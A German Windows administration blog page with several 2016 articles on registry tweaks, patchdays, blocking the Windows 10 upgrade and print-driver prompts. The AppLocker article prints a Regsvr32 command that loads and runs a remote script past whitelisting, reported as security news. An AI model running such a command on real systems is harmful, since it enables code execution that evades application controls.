Kategorie: Windows 7

Lösung: Windows ignoriert Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen

In größeren Firmennetzwerken mit vielen Clients wird oftmals von der Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen (Point and Print Restrictions) Gebrauch gemacht, um den Administrationsaufwand gering zu halten. Mit dieser Einstellung lässt sich steuern, wie Benutzer Druckertreiber von Druckerservern installieren können.

Seit einigen Wochen kommt es allerdings teilweise zu Problemen. Einige User berichten von einer Sicherheitsmeldung, wenn sie bestimmte Drucker verknüpfen bzw. installieren wollen. Die Meldung lautet „Vertrauen Sie diesem Drucker?“.

Vertrauen Sie diesem Drucker?

Ursache des Problems ist das Security-Bulletin MS16-087 aus dem Juli-Patchday. Genauer gesagt KB3170455 unter Windows 7 bzw. 8.1 und KB3163912 unter Windows 10 bzw. KB3172985 bei Windows 10 v1511. Nach der Deinstallation des entsprechenden Updates ist das Problem verschwunden und die Benutzer können ohne Warnmeldung Drucker installieren. Allerdings ist dieser Workaround nicht empfehlenswert und in vielen Netzwerken auch gar nicht möglich.

Auf der Suche nach einer sinnvollen Lösung bin ich auf den Thread „KB3163912 breaks Point and Print Restrictions GPO settings“ im TechNet gestoßen. Hier berichten viele User von ähnlichen Problemen. Nach weiterer Fehlersuche war schnell klar, dass dieses Problem lediglich bei Druckern auftritt, die keine „packaged“-Treiber verwenden.

Einige haben sogar einen Case via Microsoft-Premiumsupport eröffnet. Die offizielle Antwort von Microsoft lautet, den Druckerhersteller zu kontaktieren und „packaged“ Treiber zu verwenden. Leider existiert in einigen Fällen aber kein „packaged“-Treiber, was vor allem (aber nicht ausschließlich) ältere Drucker betrifft.

Lösung

Schlussendlich hat ein findiger User doch noch eine brauchbare Lösungsmöglichkeit vorgeschlagen. Mit Hilfe der Registry lässt sich ein „un-packaged“-Treiber in einen „packaged“-Treiber verwandeln. Dazu öffnet man den Registrierungseditor und navigiert zu folgendem Pfad:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Enviroments\Windowsx64\Drivers\...\

Dort angekommen wählt man links den betroffenen Druckertreiber aus, in meinem Beispiel den „Brother PCL5e Driver“.

Rechts muss der Wert „PrinterDriverAttributes“ angepasst werden. Das niedrigste Bit des Wertes ist für die Eigenschaft „Package Aware“ zuständig und muss entsprechend auf „1“ gesetzt werden. Der vorhandene Wert muss dabei ungerade gemacht werden, d.h. ein Wert von „0“ wird auf „1“ gesetzt, ein Wert von „2“ auf „3“ usw. Wenn der Wert beispielsweise „5“ ist dann passt er bereits und es muss nichts geändert werden. Danach muss noch der Druckdienst (Spooler, deutsch: Druckerwarteschlange) neugestartet werden. Ab diesem Zeitpunkt meldet sich der Treiber als „packaged“ und kann ohne weiteren Benutzereingriff installiert werden.

Alternativ kann der betroffene Druckertreiber auch von Hand in einen „packaged“-Treiber umgewandelt werden. Hierzu reicht eine kleine Anpassung der INF-Datei aus. Bei Microsoft existieren weitere Informationen dazu. Vielleicht bekommen es damit auch einige Druckerhersteller gebacken, endlich „packaged“-Treber anzubieten.

Ab Oktober 2016 nur noch kumulative Updates für Windows 7 und 8.1

Microsoft Logo

Microsoft hat bekannt gegeben, dass es für Windows 7 und 8.1 zukünftig keine einzelnen Updates mehr, sondern nur noch kumulative Rollup-Pakete geben wird. Die Änderung soll ab Oktober 2016 Einzug halten und betrifft auch Windows Server 2008 R2, 2012 und 2012 R2.

Die kumulativen Rollup-Pakete werden ab Oktober eingeführt und werden ab diesem Zeitpunkt dann auch jeweils die Korrekturen der Vormonate enthalten. Längerfristig möchte Microsoft aber nach und nach auch alle bisher erschienenen Updates in die kumulativen Pakete integrieren. Für das .NET-Framework, Flash und den Internet Explorer sollen jeweils eigene Rollup-Pakete erscheinen. Durch den Einsatz von sogenannten „Express Packages“ möchte Microsoft das Downloadvolumen für die Pakete klein halten. Dabei lädt der Windows-Client nur die tatsächlich benötigten Teile eines Update-Pakets herunter.

Neben den Rollup-Paketen, welche sowohl sicherheits- und nicht-sicherheitskritische Updates enthalten, wird Microsoft für Firmenkunden auch monatliche Sicherheits-Sammelpatches anbieten. Diese sind nicht kumulativ und enthalten alle Sicherheits-Updates für den jeweiligen Monat.

Durch diese Änderung möchte Microsoft die starke Fragmentierung von Windows 7 und 8.1 eindämmen und bestenfalls komplett beenden. Gleichzeitig möchte der Softwareriese damit die Anzahl der unterschiedlichen Systemkonfigurationen und potenziellen Fehlerquellen verringern. Ein Vorteil dabei ist, dass ein frisch installiertes Windows 7 oder 8.1 im besten Fall nur wenige Pakete installieren muss, um den aktuellen Patch-Stand zu erreichen. Allerdings bietet das Vorgehen von Microsoft auch einige Nachteile. Beispielsweise können problematische Patches dann nicht mehr wie bisher einzeln deinstalliert werden. Außerdem könnte Microsoft damit noch einfacher unerfreuliche funktionelle Änderungen verbreiten, Stichwort Telemetrie-Updates oder das GWX-Tool.

Microsoft-Patchday August 2016

Microsoft Logo

Am heutigen Patchday veröffentlicht Microsoft neun Security-Bulletins, von denen fünf als „kritisch“ und vier als „hoch“ eingestuft werden. Insgesamt sollen 34 Sicherheitslücken durch die Updates behoben werden. Neben den obligatorischen Updates für den Internet Explorer und Edge-Browser, stehen auch Updates für Office und Skype for Business bereit.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-095  Cumulative Security Update for Internet Explorer (3177356) Critical
Remote Code Execution
Requires restart
MS16-096  Cumulative Security Update for Microsoft Edge (3177358) Critical
Remote Code Execution
Requires restart
MS16-097  Security Update for Microsoft Graphics Component (3177393) Critical
Remote Code Execution
May require restart
MS16-098  Security Update for Windows Kernel-Mode Drivers (3178466) Important
Elevation of Privilege
Requires restart
MS16-099 Security Update for Microsoft Office (3177451) Critical
Remote Code Execution
May require restart
MS16-100 Security Update for Secure Boot (3179577) Important
Security Feature Bypass
Does not require restart
MS16-101 Security Update for Windows Authentication Methods (3178465) Important
Elevation of Privilege
MS16-102 Security Update for Microsoft Windows PDF Library (3182248) Critical
Remote Code Execution
May require restart
MS16-103 Security Update for ActiveSyncProvider (3182332) Important
Information Disclosure
Requires restart

Windows-Schwachstelle erlaubt Umgehung von AppLocker

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms „Regsvr32“ (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann „regsvr32.exe“ über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Windows 10 Upgrade blockieren

Windows 10 Logo

Nach wie vor wirbt Microsoft unter Windows 7 und Windows 8.1 recht aufdringlich für das Upgrade auf Windows 10. Selbst wer den Upgrade-Hinweis bereits entfernt hatte, bekommt ihn mittlerweile wieder zu Gesicht. Das liegt daran, dass Microsoft das dafür verantwortliche Windows-Update KB3035583 in einer neuen Revision veröffentlicht hat. Darüber hinaus berichten einige Nutzer davon, dass die GWX-Applikation bei jedem Start bzw. bei jeder Aktivierung aus dem Standby-Modus abstürzt. Die Fehlermeldung muss dann jedes Mal geschlossen werden.

Beim jüngsten Patchday wurde das Upgrade auf Windows 10 sogar standardmäßig von der Windows-Update-Funktion zur Verfügung gestellt. Mittlerweile hat sich aber herausgestellt, dass dies laut Microsoft ein Fehler war und nur einen kleinen Teil der Nutzer von Windows 7 bzw. 8.1 betroffen hat.

Kurzum der Upgrade-Hinweis ist mehr als nervig und möchte von vielen Windows-Usern entfernt werden. Um diesen Weg etwas zu vereinfachen, biete ich ein Registry-Skript an, welches mit Administratorrechten ausgeführt werden muss.

Download Registry-Skript zum Blockieren vom Windows 10 Upgrade

Wer möchte kann die Änderungen in der Registry natürlich auch von Hand erledigen:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\GWX]
"DisableGWX"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade]
"AllowOSUpgrade"=dword:00000000
"ReservationsAllowed"=dword:00000000

Nach einem Neustart sollte der störende Upgrade-Hinweis endgültig der Vergangenheit angehören. Falls doch nicht, könnt ihr alternativ auch das PowerShell-Skript von der c’t ausprobieren. Wenn auch das nichts hilft, bleibt euch wohl nichts anderes übrig als den Hinweis zu ertragen oder alternativ das Upgrade auf Windows 10 durchzuführen ;-)

Windows 10 Upgrade-Hinweis entfernen

Microsoft Logo
Die Tipps hier bringen mittlerweile keinen Erfolg mehr, deshalb habe ich einen neuen Artikel veröffentlicht:
Windows 10 Upgrade blockieren

Windows 10 Upgrade HinweisSeit Montag können Nutzer von Windows 7 und Windows 8.1 das kostenlose Upgrade auf das neue Windows 10 reservieren. Gleichzeitig hat Microsoft ein Update verteilt, welches alle entsprechenden Nutzer auf diese Möglichkeit mit einem Icon in der Taskleiste hinweist (siehe Screenshot).

Allerdings bleibt das Upgrade-Symbol dauerhaft im Tray eingeblendet, auch wenn eine Reservierung getätigt wurde. Nachfolgend zeige ich euch drei Wege, wie ihr das nervige Tray-Icon wieder entfernen könnt.

Registrierungs-Editor

Die zuverlässigste Möglichkeit zum entfernen des Upgrade-Hinweises auf Windows 10 verbirgt sich in der Registry.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
  3. HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade
  4. Falls die letzten beiden Schlüssel des Pfads nicht existieren ist das entsprechende Windows-Update noch nicht installiert. Die Schlüssel können dann einfach von Hand angelegt werden. Im Punkt 3 beschriebenen Pfad muss der Wert „ReservationsAllowed“ auf „0“ gesetzt werden.

(via)

Update deinstallieren

Die dritte Möglichkeit ist das entsprechende Windows-Update KB3035583 zu deinstallieren, welches für den Upgrade-Hinweis verantwortlich ist. Die Deinstallation kann über „Windows Update“ und „Installierte Updates“ erfolgen. Nach der erfolgreichen Deinstallation muss das Update KB3035583 allerdings noch versteckt werden, da es ansonsten erneut auf dem System installiert wird.

Windows 10 Upgrade ausblenden

Icon verstecken

Das Ausblenden des Upgrade-Symbols im System Tray sollte für die meisten Nutzer ausreichend sein. Dazu klickt man auf das „Pfeil nach oben“-Icon im System Tray links neben der Uhrzeit und wählt anschließend „Anpassen“ aus. Im neu geöffneten Fenster muss der Eintrag „GWX“ auf „Symbol und Benachrichtigungen ausblenden“ gestellt werden. Fertig.

Windows 10 Upgrade ausblenden

Windows Laufwerksbuchstaben vor dem Namen anzeigen

Im Windows Explorer werden die Laufwerksbuchstaben standardmäßig hinter dem Namen der Laufwerke angezeigt. In einigen Fällen ist es aber sinnvoll den Laufwerksbuchstaben vor dem Namen anzeigen zu lassen, beispielsweise wenn viele Netzlaufwerke verwendet werden. Mit einer kleinen Änderung in der Registry lässt sich dies bewerkstelligen. Dieser Tipp funktioniert unter Windows 7, Windows 8 bzw. Windows 8.1 sowie Windows 10.

Windows Laufwerksbuchstaben

  1. Den Registrierungs-Editor mit Administratorrechten starten. Am einfachsten funktioniert dies über die Suchfunktion.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
  3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „ShowDriveLettersFirst“ erstellt werden.
  4. Der Wert muss auf „4“ gesetzt werden. Wer die Laufwerksbuchstaben wieder nach dem Namen sehen möchte, kann den Wert auf „0“ setzen.
  5. Nach einem Neustart bzw. nach dem Ab- und wieder Anmelden sind die Änderungen wirksam.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Laufwerksbuchstaben_Registry

Zugriff auf Netzwerklaufwerke mit aktivierter Benutzerkontensteuerung (UAC) nicht möglich

Bei aktivierter Benutzerkontensteuerung (UAC) kann es vorkommen, dass Netzwerklaufwerke in Programmen, die mit administrativen Rechten laufen, nicht angezeigt werden. Auch Microsoft beschreibt dieses Problem.

Ursache ist die Art und Weise, wie Windows mit aktivierter Benutzerkontensteuerung arbeitet. Wenn Netzlaufwerke per Anmeldeskript verbunden werden, erfolgt dies mit dem standardmäßigen Benutzer-Token, d.h. mit eingeschränkten Rechten. Programme, die mit administrativen Rechten laufen (nach Bestätigung des Benutzerkontensteuerung-Pop-Ups), arbeiten jedoch mit einem anderen Benutzer-Token. Dadurch sind Netzlaufwerke, welche mit dem eingeschränkten Benutzer-Token verbunden werden, nicht für das administrative Benutzer-Token vorhanden.

Dieses Verhalten lässt sich aber mittels eines kleinen Eingriffs in die Registry abstellen.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „EnableLinkedConnections“ erstellt werden.
  4. Der Wert muss auf „1“ gesetzt werden.
  5. Nach einem Neustart sind die Änderungen wirksam und Netzwerklaufwerke stehen auch im administrativen Kontext zur Verfügung.

Speicherplatz freischaufeln durch Löschen von alten Windows Updates

Microsoft Logo

Bei allen Windows-Systemen sammeln sich mit der Zeit viele Altlasten an, die nur Speicherplatz verbrauchen, aber eigentlich gar nicht mehr benötigt werden. So ist es auch mit den Dateien von alten Windows Updates. Diese befinden sich sogar an zwei unterschiedlichen Speicherorten, die bei älteren Windows-Installationen insgesamt mehrere Gigabyte ausmachen können. Der potenziell verfügbare freie Speicherplatz ist besonders bei alten Servern oder kleinen System-SSDs gern gesehen.

Nachfolgend zeige ich euch die beiden Möglichkeiten auf, wie ihr alle alten Update-Dateien unter Windows löschen könnt.

Alte Update-Dateien mit der Datenträgerbereinigung löschen

Nicht mehr benötigte Update-Dateien von bereits installierten Updates können ab Windows 8 bzw. Windows Server 2012 ganz einfach mit der Datenträgerbereinigung gelöscht werden. Bei Windows 7 bzw. Windows Server 2008 R2 ist dies jedoch erst mit dem Update KB2852386 möglich, welches im Oktober 2013 von Microsoft veröffentlicht wurde.

Als kleine Nebenwirkung ist zu beachten, dass die entsprechenden Updates dann nicht mehr deinstallierbar sind. Eine Deinstallation eines Updates ist dann nur möglich, wenn das entsprechende Update vorher manuell noch einmal installiert wurde.

Therefore, after you run the Disk Cleanup wizard, you may be unable to roll back to a superseded update. If you want to roll back to a superseded update that the Disk Cleanup wizard deletes, you can manually install the update.

  1. Die Datenträgerbereinigung starten. Am einfachsten funktioniert dies direkt über das Startmenü oder unter der „Systemsteuerung“ im Ordner „Verwaltung“.
    Windows Datenträgerbereinigung
  2. Anschließend auf den Button „Systemdateien bereinigen“ klicken. Jetzt wird die Datenträgerbereinigung mit Administratorrechten neugestartet.
  3. Zum Schluss den Haken bei „Windows Update-Bereinigung“ setzen und starten. Je nach Anzahl der Updates und Performance der Festplatte kann der Vorgang durchaus bis zu 30 Minuten dauern.
    Windows Datenträgerbereinigung

Temporäre Windows Update-Dateien löschen

Neben den nicht mehr benötigten Update-Dateien von bereits installierten Updates existiert noch ein zweiter Speicherort, in dem heruntergeladene Updates landen. Nach einer erfolgreichen Installation werden die Dateien nicht mehr benötigt. Hier können im Vergleich zur ersten Möglichkeit auch keine Probleme auftreten.

Daher können alle Dateien und Ordner unter folgendem Pfad gefahrlos gelöscht werden:

%WINDIR%\SoftwareDistribution\Download

Die zweite Möglichkeit liefert in der Regel deutlich weniger Speicherplatz als die erste, ist aber dafür umso schneller erledigt.

Nerviges Aero Shake Feature deaktivieren

Mit Windows 7 hat Microsoft das sogenannte „Aero Shake“ Feature eingeführt. Wird das aktuelle Fenster an der Titelleiste mit der linken Maustaste gepackt und geschüttelt, werden alle anderen Fenster minimiert. Das „geschüttelte“ Fenster bleibt sichtbar. Obwohl das Feature auf den ersten Blick ganz nützlich erscheint, kann es aber auch durch Versehen ausgelöst werden und ist in diesem Fall dann einfach nur störend.

Aus diesem Grund zeige ich euch, wie ihr Aero Shake ganz einfach deaktivieren könnt.

Möglichkeit 1: Editor für lokale Gruppenrichtlinien

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „gpedit.msc“ eingeben.
  2. Unter „Benutzerkonfiguration“ zu „Administrative Vorlagen“ und „Desktop“ wechseln.
  3. Im rechten Fensterbereich auf „Aero Shake-Mausbewegung zum Minimieren von Fenstern deaktivieren“ doppelklicken.
  4. In dem neu geöffneten Fenster „Aktiviert“ auswählen und die Änderungen bestätigen.

Möglichkeit 2: Registrierungs-Editor

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
  3. Darunter muss ein neuer „DWORD-Wert (32-Bit)“ mit dem Namen „NoWindowMinimizingShortcuts“ erstellt werden.
  4. Dieser erhält den Wert auf „1„.
  5. Nach einem Neustart sollten die Änderungen übernommen wer

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

IPv6 unter Windows systemweit deaktivieren

Microsoft Logo

IPv6 wird seit Windows Vista bzw. Windows Server 2008 unterstützt und ist auch standardmäßig aktiviert. Sofern im Netzwerk keine Notwendigkeit für IPv6 gegeben ist, kann es ohne Probleme deaktiviert werden.

Soll IPv6 systemweit abgeschaltet werden, muss dies über die Registry erfolgen. Der zunächst offensichtliche Weg über die Eigenschaften der Netzwerkverbindung ist nicht zielführend. Bei dieser Methode wird IPv6 nur für das jeweilige Interface deaktiviert. Das Loopback- und die Tunnel-Interface verwenden weiterhin IPv6.

Eine bessere Variante ist über die Registry verfügbar, wobei aber auch hier IPv6 für das Loopback-Interface aktiviert bleibt. Das dürfte aber nicht weiter schlimm sein, da diese Methode gleichzeitig auch dafür sorgt, dass IPv4 bevorzugt behandelt wird.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP6\Parameters
  3. Hier muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen “DisabledComponents” erstellt werden.
  4. Anschließend den Wert auf “ff” Hexadezimal setzen.
  5. Nach einem Neustart ist IPv6 komplett deaktiviert.

Zur leichteren Anwendung biete ich euch eine Registry-Datei zum Download an, die alle notwendigen Schritte automatisch erledigt. Detailliertere Informationen gibts direkt bei Microsoft.

Download Registrydatei zum Deaktivieren von IPv6 systemweit

RDP 8.1 Update für Windows 7 und Server 2008 R2

RDP8.1Mit Windows 8.1 bzw. Windows Server 2012 R2 hat Microsoft dem Remote Desktop Protocol (RDP) einige Verbesserungen verpasst. Nachfolgend eine kurze Übersicht der Neuerungen:

  • schnellere Wiederherstellung von Verbindungen zu einer Remote-Sitzung
  • Unterstützung von transparenten Fenstern oder Rahmen (beispielsweise Office 2013)
  • RemoteApp verhält sich stärker wie lokale Programme (beim Verschieben und Vergrößern von Fenstern wird der Fensterinhalt angezeigt)
  • Unterstützung für „Restricted Admin Mode“
  • Spiegeln von Sitzungen möglich

Um nun unter Windows 7 in den Genuss des verbesserten RDP-Clients zu kommen, müssen einige Updates installiert werden. Grundvoraussetzung für die Installation der Updates ist Windows 7 mit installiertem Service Pack 1. Außerdem müssen bereits die Updates KB2574819 und KB2857650 vorhanden sein. Danach kann KB2830477 installiert werden. Alle drei Updates können direkt bei Microsoft heruntergeladen werden.

Abschließend kann noch das Update KB2923545 installiert werden, welches einige Zuverlässigkeits- und Stabilitätsverbesserungen bietet.